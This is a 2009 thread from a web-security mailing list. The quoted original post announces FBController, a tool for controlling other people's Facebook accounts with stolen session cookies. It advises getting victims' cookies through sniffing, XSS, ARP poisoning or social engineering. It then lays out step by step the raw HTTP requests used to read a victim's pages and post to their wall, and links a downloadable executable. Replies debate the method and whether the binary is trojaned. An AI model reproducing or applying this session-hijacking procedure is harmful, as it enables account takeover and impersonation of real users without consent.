[prev in list] [next in list] [prev in thread] [next in thread]
List: websecurity
Subject: RE: [WEB SECURITY] FBController - (Facebook Control Utility) version 1.0
From: QUAKER DOOMER <quakerdoomer () inbox ! lv>
Date: 2009-05-01 5:36:20
Message-ID: 1241156180.49fa8a544b8db () mail ! inbox ! lv
[Download RAW message or body]
Dear Arshan,
I really appreciate your suggestions about the secure autoupdate feature. Thanks for
that.
Also,
1 > FBController Project DOES NOT aim to transmorgify into a Facebook botnets
Controller.
2 > I don't see anything to regret about FBController or any other application being a
exe.
There are many softwares like MS Windows, MS Office, Opera, OpenDocument
format, Adobe Flash Player, Skype, etc. which we blindly trust and use without
questioning or cross checking for backdoor instances.
(Just because they are under established banners, but in the end still written by
human beings. Programmers on monthly salaries !).
Most of my TooLs are executable binaries. I am now working on winAUTOPWN for
FreeBSD (again FreeBSD ELF binaries, both 32 and amd64, which WON'T [easily]
run on Linux .. Can be checked with brandelf)
3 > I don't backdoor my releases !
Also its unwise to provide the real identity alongwith publically releasing a Trojan. I
don't want you to blindly trust FBController. Please run FBController under a Virtual
Machine to check if still unsure.
4 > Yesterday Facebook stopped using the ABT= variable. I need to confirm this with
a few more Facebook cookie sniffing users.
This further strengthens my determination for version 2 but not at the cost of
winAUTOPWN suffering.
Let me know :-)
Regards,
QD
Quoting Arshan Dabirsiaghi <arshan.dabirsiaghi@aspectsecurity.com>:
> I can kind of see the point if you're looking to control a physically
> unmanageable number of accounts simultaneously, like a Facebook botnet.
>
> However, I think you (QUAKER DOOMER) will regret two things about this
> tool you've written:
>
> 1) You released it as an .exe so pretty much no one will download it.
> Maybe a bored binary analysis type will just to see if and how you've
> trojaned it.
> 2) The moment Facebook makes some minor change to their workflow your
> tool becomes instantly useless. Next time, try some browser recording
> mechanism (like Selenium + Ruby output) and have the tool use a simple,
> secure auto-update feature to adapt to workflow changes in an agile way.
>
> Arshan
>
> ________________________________
>
> From: Chris Eng [mailto:ceng@Veracode.com]
> Sent: Thu 4/30/2009 4:59 PM
> To: QUAKER DOOMER; websecurity@webappsec.org
> Subject: RE: [WEB SECURITY] FBController - (Facebook Control Utility)
> version 1.0
>
>
>
> Apologies if I'm overlooking something here, but if you have the victim's
> Facebook cookie, why wouldn't you simply use an HTTP proxy or Firefox
> plugin to inject the stolen cookie into a request for /home.php, and then
> let the web browser do the rest of the work calculating/updating all the
> tokens?
>
>
>
>
> > -----Original Message-----
> > From: QUAKER DOOMER [mailto:quakerdoomer@inbox.lv]
> > Sent: Thursday, April 30, 2009 4:32 PM
> > To: websecurity@webappsec.org
> > Subject: [WEB SECURITY] FBController - (Facebook Control Utility)
> version 1.0
> >
> > FBController - The Ultimate Utility to Control Facebook accounts
> without the
> > Password.
> >
> > Let me clear that this utility WON'T hack/crack Facebook accounts.
> > The utility will need biscuits/cookies instead of the password.
> >
> > Get the target's cookie by sniffing, XSS, social engineering, ARP
> Poison-
> > Sniffing,
> > scroogle search, anyhow !
> > Once you have the cookies you can use FBController and have Full
> control over
> > the
> > target's Facebook account.
> >
> >
==============================================================
> > Login to your Facebook account and sniff your cookie OR collect a
> few live
> > Facebook
> > Biscuit/s of your Target/s.
> >
> > 1 ] Generate a OG 10 Digit Unix Timestamp. If possible not way back
> older
> > than
> > FaceBook.COM's current SYSTIME.
> >
> >
> > 2 ] Send a GET Request to www.facebook.com port 80 after calculating
> the
> > required
> > variables (below)
> > [code]
> > GET /home.php? HTTP/1.1
> > Cookie:
> datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
> > BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
> > PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA;
> > test_cookie=1; login=+; s_cc=true;
> s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
> > BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D
%5D;
> > cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-
NEWTIMESTAMP)859;
> > login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A
%22youremailid
> > %40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
> > %3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES);
> > c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID);
> made_write_conn=(OG-TIME-
> > STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-
> > FOREVER-FIXED-FOR-YOUR-ID); locale=en_US
> > [/code]
> >
> >
> > 3 ] From the Response Obtained :
> > Gain the variable nctr[nid]. For now keep nctr[id] same as
> nctr[nid].
> >
> > Calculating the new nctr[ct] :
> > Add +79 to Original Timestamp. Append 3 more digits to its end.
> >
> > Calculating &oldest= :
> > Deduct 144556 from Original Timestamp.
> >
> > Calculating composer_id :
> > Search for
> > UIComposer_STATE_PIC_OUTSIDE\" id=\"
> > This will be your composer_id at the later stage in the Status
> Update Page /
> > Other
> > Post Request
> >
> > Calculating post_form_id
> > Search for
> > post_form_id:"
> > This will be your post_form_id at the later stage in the Status
> Update Page /
> > Other
> > Post Request
> >
> > Calculating fb_dtsg
> > Right after post_form_id (explained just above this section) you can
> locate
> > fb_dtsg.
> > Else Search for
> > ,fb_dtsg:"
> > This will be your fb_dtsg at the later stage in the Status Update
> Page /
> > Other Post
> > Request
> >
> > Your login_x actually looks like
> >
> a:2:{s:5:"email";s:13:"you@youremailprovider.com";s:19:"remember_me_default";
> > b:0;}
> > But keep it unchanged in the hex format.
> >
> >
> > 4 ] Send a GET Request like below with the above calculated
> variables :
> > [code]
> > GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-
> >
> CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-
> >
> STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-
> >
> FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750
> > HTTP/1.1
> > Accept: */*
> > Accept-Language: en-US
> > XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> > x-svn-rev: 161013
> > UA-CPU: x86
> > XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
> > User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
> > Host: www.facebook.com
> > Connection: Keep-Alive
> > Cookie:
> datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
> > BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
> > PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA;
> > test_cookie=1; login=+; s_cc=true;
> s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
> > BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D
%5D;
> > login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A
%22youremailid
> > %40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
> > %3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES);
> > c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID);
> made_write_conn=(OG-TIME-
> > STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-
> > FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F
> > %2Fwww.facebook.com%2Fhome.php
> > [/code]
> >
> > 5 ] In the output :
> > Search for Env[\"nctrlid\"]=\"
> > This is the NEW TRUE nctr[id]= for the Status Update POST Request
> :-)
> >
> >
> > 6 ] Generate a new POST Request with the above calculated new
> variables :
> > [code]
> > POST /updatestatus.php HTTP/1.1
> > Accept: */*
> > Accept-Language: en-US
> > XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> > x-svn-rev: 161013
> > Content-Type: application/x-www-form-urlencoded
> > UA-CPU: x86
> > XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
> > User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
> > Host: www.facebook.com
> > Content-Length: 343
> > Connection: Keep-Alive
> > Cache-Control: no-cache
> > Cookie:
> datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
> > BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
> > PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA;
> > test_cookie=1; login=+; s_cc=true;
> s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
> > BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D
%5D;
> > login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A
%22youremailid
> > %40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
> > %3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES);
> > c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3;
> h_user=(12-
> > HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US;
> x-referer=http%3A
> > %2F%2Fwww.facebook.com%2Fhome.php
> >
> >
> action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-
> >
> ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-
> >
> STRING-OBTAINED-FROM-home.php-RESPONSE))&post_form_id=(32-HEX-
STRING-
> > FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-
> >
> RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-
> >
> CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-
OBTAINED-
> >
> FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-
> > EXPLAINED-In-POINT-3)375
> > [/code]
> >
> >
> > 7 ] Use the above variables to view any content with the appropriate
> GET /
> > requests
> >
> >
> > 8 ] For POST-ing making changes, GOTO 2 ] and REDO :-)
> >
> >
> > Looks like loads of HardWork ha ?
> > If you don't want to do all this manually, then you can download
> this TooL
> > named
> > FBController (FACEBOOK CONTROLLER) written
> > by me.
> > Till now FBController version 1.0 uses your Target's provided cookie
> and only
> > :
> >
> > A > Downloads the HomePage.
> > B > Allows you to Update the Target's Wall and
> > C > Retrieve your Target's Friend's List
> >
> > There are many APIs available to write apps and 3rd party Tools for
> FB in
> > Java,
> > Perl, .NET, etc.
> >
> > FBConTroller was entirely written without knowing any of Facebook's
> Dev
> > API's.
> > Considering the above alongwith Facebook's complexity, the next
> version might
> > take
> > some time to get released
> >
> > Many more features to come in version 2.0
> >
> > A 26th April Release !
> > Research duration some 33 hours - Sunday Evening 26th April 2009
> -to- 29th
> > April
> > 2009.
> >
> > Happy Controlling ! :-)
> >
==============================================================
> >
> > Download :
> http://my.opera.com/quakerdoomer/blog/2009/04/30/fbcontroller-
> > facebook-
> > controller-the-ultimate-facebook-controller-without-the-pa
> >
> > The Latest available release is FBCONTROLLER version 1.0
> > Coded by : Azim Poonawala (QUAKERDOOMER)
> > Author's website : http://solidmecca.co.nr
> <http://solidmecca.co.nr/>
> >
> > Regards,
> > QUAKERDOOMER
> >
> >
> >
> ----------------------------------------------------------------------------
> > Join us on IRC: irc.freenode.net #webappsec
> >
> > Have a question? Search The Web Security Mailing List Archives:
> > http://www.webappsec.org/lists/websecurity/archive/
> >
> > Subscribe via RSS:
> > http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
> >
> > Join WASC on LinkedIn
> > http://www.linkedin.com/e/gis/83336/4B20E4374DBA
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic